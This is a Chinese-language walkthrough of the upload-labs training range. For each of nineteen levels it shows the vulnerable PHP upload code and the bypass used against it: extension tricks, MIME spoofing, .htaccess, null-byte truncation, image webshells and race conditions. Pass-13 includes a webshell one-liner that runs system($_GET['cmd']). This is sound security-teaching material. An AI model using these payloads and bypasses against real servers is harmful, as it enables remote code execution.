保存 如果 mage ace 配置文件 exif 顯示 tmp 競爭條件

介紹：

Upload-labs是一個所有類型的上傳漏洞的靶場

思維導圖：

小試牛刀：

Pass-01

客戶端js檢查

思路：將PHP後綴的文件，改為.jpg格式的，然後上傳抓包，將後綴名改回去，改成.php後綴的格式，即可繞過前端JS的校驗

getshell

Pass-02

直接上產PHP腳本文件，提示如下：

繞過思路：類型繞過： image/jpeg

getshell

pass-03

黑名單繞過，禁止上傳.asp|.aspx|.php|.jsp後綴文件！

繞過思路：上傳：.php3 .phtml

具體原理

<IfModule php5_module>

PHPIniDir "C:/phpStudy-01/PHP/"

AddType application/x-httpd-php .php .phtml

AddType application/x-httpd-php .php .phtml .php3

AddType application/x-httpd-php-source .phps

</IfModule>

getshell

pass-04

黑名單繞過

getshell

原理：

先來看一下apache的主配置文件httpd.conf，搜索“DefaultType”，就可以看到這麽一段註釋和默認配置：

#
# DefaultType: the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#10DefaultType text/plain

DefaultType存在的意義是告訴apache該如何處理未知擴展名的文件，比如f4ck.xxx這樣的文件，擴展名是xxx，這肯定不是一個正常的網頁或腳本文件，這個參數就是告訴apache該怎麽處理這種未知擴展名的文件。

參數DefaultType的默認值是“text/plain”，也就是遇到未知擴展名的文件，就把它當作普通的txt文本或html文件來處理。

測試一

比如我將以下代碼保存為f4ck.xxx 默認解析成文本

測試二

那麽，對於文件內容為php代碼的未知擴展名文件來說也是解析成文本

對於f4ck.php.xxx，那麽就會被以module方式運行php的apache解析，因為Apache認為一個文件可以擁有多個擴展名，哪怕沒有文件名，也可以擁有多個擴展名。Apache認為應該從右到左開始判斷解析方法的。如果最右側的擴展名為不可識別的，就繼續往左判斷，直到判斷到文件名為止。

解決方案一

在httpd.conf或httpd-vhosts.conf中加入以下語句，從而禁止文件名格式為*.php.*的訪問權限：

<FilesMatch ".(php.|php3.|php4.|php5.)">
Order Deny,Allow
Deny from all
</FilesMatch>

解決方案二

如果需要保留文件名，可以修改程序源代碼，替換上傳文件名中的“.”為“_”：

$filename = str_replace(‘.‘, ‘_‘, $filename);

還可以上傳：.htaccess

內容為：SetHandler application/x-httpd-php

然後更改PHP的後綴為：.gif 即可

pass-05

黑名單繞過 本pass禁止上傳.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess後綴文件！

貌似沒有.PHP結尾的文件，可以嘗試下

getshell

pass-06

黑名單機制，查看源碼：

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

$file_name = $_FILES[‘upload_file‘][‘name‘];

$file_name = deldot($file_name);//刪除文件名末尾的點

$file_ext = strrchr($file_name, ‘.‘);

$file_ext = strtolower($file_ext); //轉換為小寫

$file_ext = str_ireplace(‘::$DATA‘, ‘‘, $file_ext);//去除字符串::$DATA

if (!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = UPLOAD_PATH.‘/‘.date("YmdHis").rand(1000,9999).$file_ext;

if (move_uploaded_file($temp_file,$img_path)) {

$is_upload = true;

} else {

$msg = ‘上傳出錯！‘;

}

} else {

$msg = ‘此文件不允許上傳‘;

}

} else {

$msg = UPLOAD_PATH . ‘文件夾不存在,請手工創建！‘;

}

}

沒有對文件的末尾的空格進行處理，所以可以嘗試繞過

getshell

pass-07

黑名單機制

查看源碼：

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

$file_name = trim($_FILES[‘upload_file‘][‘name‘]);

$file_ext = strrchr($file_name, ‘.‘);

$file_ext = strtolower($file_ext); //轉換為小寫

$file_ext = str_ireplace(‘::$DATA‘, ‘‘, $file_ext);//去除字符串::$DATA

$file_ext = trim($file_ext); //首尾去空

if (!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = UPLOAD_PATH.‘/‘.$file_name;

if (move_uploaded_file($temp_file, $img_path)) {

$is_upload = true;

} else {

$msg = ‘上傳出錯！‘;

}

} else {

$msg = ‘此文件類型不允許上傳！‘;

}

} else {

$msg = UPLOAD_PATH . ‘文件夾不存在,請手工創建！‘;

}

}

可以嘗試.php.xxx的方式繞過

getshell

pass-08

黑名單繞過

查看源碼： 去除字符串::$DATA

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

$file_name = trim($_FILES[‘upload_file‘][‘name‘]);

$file_name = deldot($file_name);//刪除文件名末尾的點

$file_ext = strrchr($file_name, ‘.‘);

$file_ext = strtolower($file_ext); //轉換為小寫

$file_ext = trim($file_ext); //首尾去空

if (!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = UPLOAD_PATH.‘/‘.date("YmdHis").rand(1000,9999).$file_ext;

if (move_uploaded_file($temp_file, $img_path)) {

$is_upload = true;

} else {

$msg = ‘上傳出錯！‘;

}

} else {

$msg = ‘此文件類型不允許上傳！‘;

}

} else {

$msg = UPLOAD_PATH . ‘文件夾不存在,請手工創建！‘;

}

}

進行繞過：

getshell

pass-09

黑名單繞過

分析源碼：

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

$file_name = trim($_FILES[‘upload_file‘][‘name‘]);

$file_name = deldot($file_name);//刪除文件名末尾的點

$file_ext = strrchr($file_name, ‘.‘);

$file_ext = strtolower($file_ext); //轉換為小寫

$file_ext = str_ireplace(‘::$DATA‘, ‘‘, $file_ext);//去除字符串::$DATA

$file_ext = trim($file_ext); //首尾去空

if (!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = UPLOAD_PATH.‘/‘.$file_name;

if (move_uploaded_file($temp_file, $img_path)) {

$is_upload = true;

} else {

$msg = ‘上傳出錯！‘;

}

} else {

$msg = ‘此文件類型不允許上傳！‘;

}

} else {

$msg = UPLOAD_PATH . ‘文件夾不存在,請手工創建！‘;

}

}

繞過方式1：

*.php.xxx

繞過方式2：

*.php. . (點+空格+點)

pass-10

黑名單機制

源碼：

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

$file_name = trim($_FILES[‘upload_file‘][‘name‘]);

$file_name = str_ireplace($deny_ext,"", $file_name); #將黑名單中的後綴替換為空

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = UPLOAD_PATH.‘/‘.$file_name;

if (move_uploaded_file($temp_file, $img_path)) {

$is_upload = true;

} else {

$msg = ‘上傳出錯！‘;

}

} else {

$msg = UPLOAD_PATH . ‘文件夾不存在,請手工創建！‘;

}

}

嘗試雙寫後綴名繞過： c99.pphphp 替換了.後面的PHP就剩下了c99.php了

getshell

pass-11

備註：11 12管需要關閉magic_quotes_gpc=Off 函數

引用的過程中只有在傳遞$_GET,$_POST,$_COOKIE時才會發生作用

白名單

源碼：

$is_upload = false;

$msg = null;

if(isset($_POST[‘submit‘])){

$ext_arr = array(‘jpg‘,‘png‘,‘gif‘);

$file_ext = substr($_FILES[‘upload_file‘][‘name‘],strrpos($_FILES[‘upload_file‘][‘name‘],".")+1);

if(in_array($file_ext,$ext_arr)){

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = $_GET[‘save_path‘]."/".rand(10, 99).date("YmdHis").".".$file_ext;

if(move_uploaded_file($temp_file,$img_path)){

$is_upload = true;

} else {

$msg = ‘上傳出錯！‘;

}

} else{

$msg = "只允許上傳.jpg|.png|.gif類型文件！";

}

}

看到imge_path是拼接的，所以可以嘗試%00 截斷，關於截斷大致說下原理：

常見的截斷上傳有：0x00，%00，/00 截斷的核心在於chr(0)這個字符，這個函數表示返回以數值表達式值為編碼的字符，舉個例，print chr（78） 結果是N，所以char(0)表示的ascll字符是null，當程序輸出包含chr(0)變量時，chr(0)後面的數據會被截斷，後面的數據直接忽略，導致漏洞產生。

getshell

pass-12

截斷上傳

$is_upload = false;

$msg = null;

if(isset($_POST[‘submit‘])){

$ext_arr = array(‘jpg‘,‘png‘,‘gif‘);

$file_ext = substr($_FILES[‘upload_file‘][‘name‘],strrpos($_FILES[‘upload_file‘][‘name‘],".")+1);

if(in_array($file_ext,$ext_arr)){

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = $_POST[‘save_path‘]."/".rand(10, 99).date("YmdHis").".".$file_ext;

if(move_uploaded_file($temp_file,$img_path)){

$is_upload = true;

} else {

$msg = "上傳失敗";

}

} else {

$msg = "只允許上傳.jpg|.png|.gif類型文件！";

}

}

分析：img_path依然是拼接的路徑，但是這次試用的post方式，還是利用00截斷，但這次需要在二進制中進行修改，因為post不會像get對%00進行自動解碼

空格的十六進制是20 ，講0x20 改成0x00 也就是00

getshell

pass-13

查看源碼，要求上傳圖片木馬

function getReailFileType($filename){

$file = fopen($filename, "rb");

$bin = fread($file, 2); //只讀2字節

fclose($file);

$strInfo = @unpack("C2chars", $bin);

$typeCode = intval($strInfo[‘chars1‘].$strInfo[‘chars2‘]);

$fileType = ‘‘;

switch($typeCode){

case 255216:

$fileType = ‘jpg‘;

break;

case 13780:

$fileType = ‘png‘;

break;

case 7173:

$fileType = ‘gif‘;

break;

default:

$fileType = ‘unknown‘;

}

return $fileType;

}

$is_upload = false;

$msg = null;

if(isset($_POST[‘submit‘])){

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$file_type = getReailFileType($temp_file);

if($file_type == ‘unknown‘){

$msg = "文件未知，上傳失敗！";

}else{

$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;

if(move_uploaded_file($temp_file,$img_path)){

$is_upload = true;

} else {

$msg = "上傳出錯！";

}

}

}

通過讀文件的前2個字節判斷文件類型，因此直接上傳圖片馬即可，制作方法：

第一種方法：copy normal.jpg /b + shell.php /a webshell.jpg

第二種方法：exiftool -Comment=‘<?php echo "<pre>"; system($_GET[‘cmd‘]); ?>‘ 1.jpg

Pass-14

圖片頭繞過

具體操作如下：

將PHP木馬文件，改成*.php;.jpg

抓包，給文件頭部加上：GIF89a 圖片頭標識

pass-15

php_exif模塊來判斷文件類型，還是直接就可以利用圖片馬就可進行繞過

Pass-16

查看源碼：

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘])){

// 獲得上傳文件的基本信息，文件名，類型，大小，臨時文件路徑

$filename = $_FILES[‘upload_file‘][‘name‘];

$filetype = $_FILES[‘upload_file‘][‘type‘];

$tmpname = $_FILES[‘upload_file‘][‘tmp_name‘];

$target_path=UPLOAD_PATH.basename($filename);

// 獲得上傳文件的擴展名

$fileext= substr(strrchr($filename,"."),1);

//判斷文件後綴與類型，合法才進行上傳操作

if(($fileext == "jpg") && ($filetype=="image/jpeg")){

if(move_uploaded_file($tmpname,$target_path))

{

//使用上傳的圖片生成新的圖片

$im = imagecreatefromjpeg($target_path);

if($im == false){

$msg = "該文件不是jpg格式的圖片！";

@unlink($target_path);

}else{

//給新圖片指定文件名

srand(time());

$newfilename = strval(rand()).".jpg";

$newimagepath = UPLOAD_PATH.$newfilename;

imagejpeg($im,$newimagepath);

//顯示二次渲染後的圖片（使用用戶上傳圖片生成的新圖片）

$img_path = UPLOAD_PATH.$newfilename;

@unlink($target_path);

$is_upload = true;

}

} else {

$msg = "上傳出錯！";

}

}else if(($fileext == "png") && ($filetype=="image/png")){

if(move_uploaded_file($tmpname,$target_path))

{

//使用上傳的圖片生成新的圖片

$im = imagecreatefrompng($target_path);

if($im == false){

$msg = "該文件不是png格式的圖片！";

@unlink($target_path);

}else{

//給新圖片指定文件名

srand(time());

$newfilename = strval(rand()).".png";

$newimagepath = UPLOAD_PATH.$newfilename;

imagepng($im,$newimagepath);

//顯示二次渲染後的圖片（使用用戶上傳圖片生成的新圖片）

$img_path = UPLOAD_PATH.$newfilename;

@unlink($target_path);

$is_upload = true;

}

} else {

$msg = "上傳出錯！";

}

}else if(($fileext == "gif") && ($filetype=="image/gif")){

if(move_uploaded_file($tmpname,$target_path))

{

//使用上傳的圖片生成新的圖片

$im = imagecreatefromgif($target_path);

if($im == false){

$msg = "該文件不是gif格式的圖片！";

@unlink($target_path);

}else{

//給新圖片指定文件名

srand(time());

$newfilename = strval(rand()).".gif";

$newimagepath = UPLOAD_PATH.$newfilename;

imagegif($im,$newimagepath);

//顯示二次渲染後的圖片（使用用戶上傳圖片生成的新圖片）

$img_path = UPLOAD_PATH.$newfilename;

@unlink($target_path);

$is_upload = true;

}

} else {

$msg = "上傳出錯！";

}

}else{

$msg = "只允許上傳後綴為.jpg|.png|.gif的圖片文件！";

}

}

綜合判斷了後綴名、content-type，以及利用imagecreatefromgif判斷是否為gif圖片，最後再做了一次二次渲染，繞過方法還是上傳圖片木馬

pass-17

競爭條件：

$is_upload = false;

$msg = null;

if(isset($_POST[‘submit‘])){

$ext_arr = array(‘jpg‘,‘png‘,‘gif‘);

$file_name = $_FILES[‘upload_file‘][‘name‘];

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$file_ext = substr($file_name,strrpos($file_name,".")+1);

$upload_file = UPLOAD_PATH . ‘/‘ . $file_name;

if(move_uploaded_file($temp_file, $upload_file)){

if(in_array($file_ext,$ext_arr)){

$img_path = UPLOAD_PATH . ‘/‘. rand(10, 99).date("YmdHis").".".$file_ext;

rename($upload_file, $img_path);

$is_upload = true;

}else{

$msg = "只允許上傳.jpg|.png|.gif類型文件！";

unlink($upload_file);

}

}else{

$msg = ‘上傳出錯！‘;

}

}

這裏先將文件上傳到服務器，然後通過rename修改名稱，再通過unlink刪除文件，因此可以通過條件競爭的方式在unlink之前，訪問webshell。

首先在burp中不斷發送上傳webshell的數據包

pass-18

分析源碼：

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘]))

{

require_once("./myupload.php");

$imgFileName =time();

$u = new MyUpload($_FILES[‘upload_file‘][‘name‘], $_FILES[‘upload_file‘][‘tmp_name‘], $_FILES[‘upload_file‘][‘size‘],$imgFileName);

$status_code = $u->upload(UPLOAD_PATH);

switch ($status_code) {

case 1:

$is_upload = true;

$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;

break;

case 2:

$msg = ‘文件已經被上傳，但沒有重命名。‘;

break;

case -1:

$msg = ‘這個文件不能上傳到服務器的臨時文件存儲目錄。‘;

break;

case -2:

$msg = ‘上傳失敗，上傳目錄不可寫。‘;

break;

case -3:

$msg = ‘上傳失敗，無法上傳該類型文件。‘;

break;

case -4:

$msg = ‘上傳失敗，上傳的文件過大。‘;

break;

case -5:

$msg = ‘上傳失敗，服務器已經存在相同名稱文件。‘;

break;

case -6:

$msg = ‘文件無法上傳，文件不能復制到目標目錄。‘;

break;

default:

$msg = ‘未知錯誤！‘;

break;

}

}

//myupload.php

class MyUpload{

......

......

......

var $cls_arr_ext_accepted = array(

".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",

".html", ".xml", ".tiff", ".jpeg", ".png" );

......

......

......

/** upload()

**

** Method to upload the file.

** This is the only method to call outside the class.

** @para String name of directory we upload to

** @returns void

**/

function upload( $dir ){

$ret = $this->isUploadedFile();

if( $ret != 1 ){

return $this->resultUpload( $ret );

}

$ret = $this->setDir( $dir );

if( $ret != 1 ){

return $this->resultUpload( $ret );

}

$ret = $this->checkExtension();

if( $ret != 1 ){

return $this->resultUpload( $ret );

}

$ret = $this->checkSize();

if( $ret != 1 ){

return $this->resultUpload( $ret );

}

// if flag to check if the file exists is set to 1

if( $this->cls_file_exists == 1 ){

$ret = $this->checkFileExists();

if( $ret != 1 ){

return $this->resultUpload( $ret );

}

}

// if we are here, we are ready to move the file to destination

$ret = $this->move();

if( $ret != 1 ){

return $this->resultUpload( $ret );

}

// check if we need to rename the file

if( $this->cls_rename_file == 1 ){

$ret = $this->renameFile();

if( $ret != 1 ){

return $this->resultUpload( $ret );

}

}

// if we are here, everything worked as planned :)

return $this->resultUpload( "SUCCESS" );

}

......

......

......

};

對文件後綴名做了白名單判斷，然後會一步一步檢查文件大小、文件是否存在等等，將文件上傳後，對文件重新命名，同樣存在條件競爭的漏洞。可以不斷利用burp發送上傳圖片馬的數據包，由於條件競爭，程序會出現來不及rename的問題，從而上傳成功

pass-19

源碼：

$is_upload = false;

$msg = null;

if (isset($_POST[‘submit‘])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

$file_name = trim($_POST[‘save_name‘]);

$file_name = deldot($file_name);//刪除文件名末尾的點

$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

$file_ext = strtolower($file_ext); //轉換為小寫

$file_ext = str_ireplace(‘::$DATA‘, ‘‘, $file_ext);//去除字符串::$DATA

$file_ext = trim($file_ext); //首尾去空

if(!in_array($file_ext,$deny_ext)) {

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$img_path = UPLOAD_PATH . ‘/‘ .$file_name;

if (move_uploaded_file($temp_file, $img_path)) {

$is_upload = true;

}else{

$msg = ‘上傳出錯！‘;

}

}else{

$msg = ‘禁止保存為該類型文件！‘;

}

} else {

$msg = UPLOAD_PATH . ‘文件夾不存在,請手工創建！‘;

}

}

此漏洞屬於截斷上傳，上傳的文件名用0x00繞過。改成*.php【二進制00】.1.jpg，上傳文件名改成要自己定義

上傳漏洞總結-upload-labs